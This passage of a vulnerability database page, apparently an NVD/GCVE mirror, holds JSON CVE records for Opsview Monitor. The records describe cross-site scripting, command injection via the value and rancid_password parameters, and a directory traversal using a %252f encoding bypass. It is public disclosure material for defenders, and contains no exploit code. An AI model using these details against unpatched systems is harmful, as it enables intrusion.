"value": "The data parameter of the /settings/api/router endpoint in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to Cross-Site Scripting."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://knowledge.opsview.com/v5.4/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"refsource": "FULLDISC",
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"name": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities",
"refsource": "MISC",
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"name": "https://knowledge.opsview.com/v5.3/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-16147",
"datePublished": "2018-09-05T21:00:00",
"dateReserved": "2018-08-29T00:00:00",
"dateUpdated": "2024-08-05T10:17:37.631Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-16146 (GCVE-0-2018-16146)
Vulnerability from nvd – Published: 2018-09-05 21:00 – Updated: 2024-08-05 10:17- n/a
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T10:17:37.835Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2018-09-04T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The web management console of Opsview Monitor 5.4.x before 5.4.2 provides functionality accessible by an authenticated administrator to test notifications that are triggered under certain configurable events. The value parameter is not properly sanitized, leading to arbitrary command injection with the privileges of the nagios user account."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-09-05T20:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-16146",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The web management console of Opsview Monitor 5.4.x before 5.4.2 provides functionality accessible by an authenticated administrator to test notifications that are triggered under certain configurable events. The value parameter is not properly sanitized, leading to arbitrary command injection with the privileges of the nagios user account."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://knowledge.opsview.com/v5.4/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"refsource": "FULLDISC",
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"name": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities",
"refsource": "MISC",
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-16146",
"datePublished": "2018-09-05T21:00:00",
"dateReserved": "2018-08-29T00:00:00",
"dateUpdated": "2024-08-05T10:17:37.835Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-16144 (GCVE-0-2018-16144)
Vulnerability from nvd – Published: 2018-09-05 21:00 – Updated: 2024-08-05 10:17- n/a
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T10:17:37.656Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2018-09-04T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The test connection functionality in the NetAudit section of Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to command injection due to improper sanitization of the rancid_password parameter."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-09-05T20:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-16144",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The test connection functionality in the NetAudit section of Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to command injection due to improper sanitization of the rancid_password parameter."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://knowledge.opsview.com/v5.4/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"refsource": "FULLDISC",
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"name": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities",
"refsource": "MISC",
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"name": "https://knowledge.opsview.com/v5.3/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-16144",
"datePublished": "2018-09-05T21:00:00",
"dateReserved": "2018-08-29T00:00:00",
"dateUpdated": "2024-08-05T10:17:37.656Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-16148 (GCVE-0-2018-16148)
Vulnerability from nvd – Published: 2018-09-05 21:00 – Updated: 2024-08-05 10:17- n/a
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T10:17:38.353Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2018-09-04T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The diagnosticsb2ksy parameter of the /rest endpoint in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to Cross-Site Scripting."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-09-05T20:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-16148",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The diagnosticsb2ksy parameter of the /rest endpoint in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to Cross-Site Scripting."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://knowledge.opsview.com/v5.4/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"refsource": "FULLDISC",
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"name": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities",
"refsource": "MISC",
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"name": "https://knowledge.opsview.com/v5.3/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-16148",
"datePublished": "2018-09-05T21:00:00",
"dateReserved": "2018-08-29T00:00:00",
"dateUpdated": "2024-08-05T10:17:38.353Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2016-10367 (GCVE-0-2016-10367)
Vulnerability from nvd – Published: 2017-05-03 10:00 – Updated: 2024-09-16 19:19- n/a
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T03:21:51.348Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In Opsview Monitor Pro (Prior to 5.1.0.162300841, prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch), an unauthenticated Directory Traversal vulnerability can be exploited by issuing a specially crafted HTTP GET request utilizing a simple URL encoding bypass, %252f instead of /."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-05-03T10:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-10367",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "In Opsview Monitor Pro (Prior to 5.1.0.162300841, prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch), an unauthenticated Directory Traversal vulnerability can be exploited by issuing a specially crafted HTTP GET request utilizing a simple URL encoding bypass, %252f instead of /."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341",
"refsource": "MISC",
"url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2016-10367",
"datePublished": "2017-05-03T10:00:00Z",
"dateReserved": "2017-05-03T00:00:00Z",
"dateUpdated": "2024-09-16T19:19:27.272Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}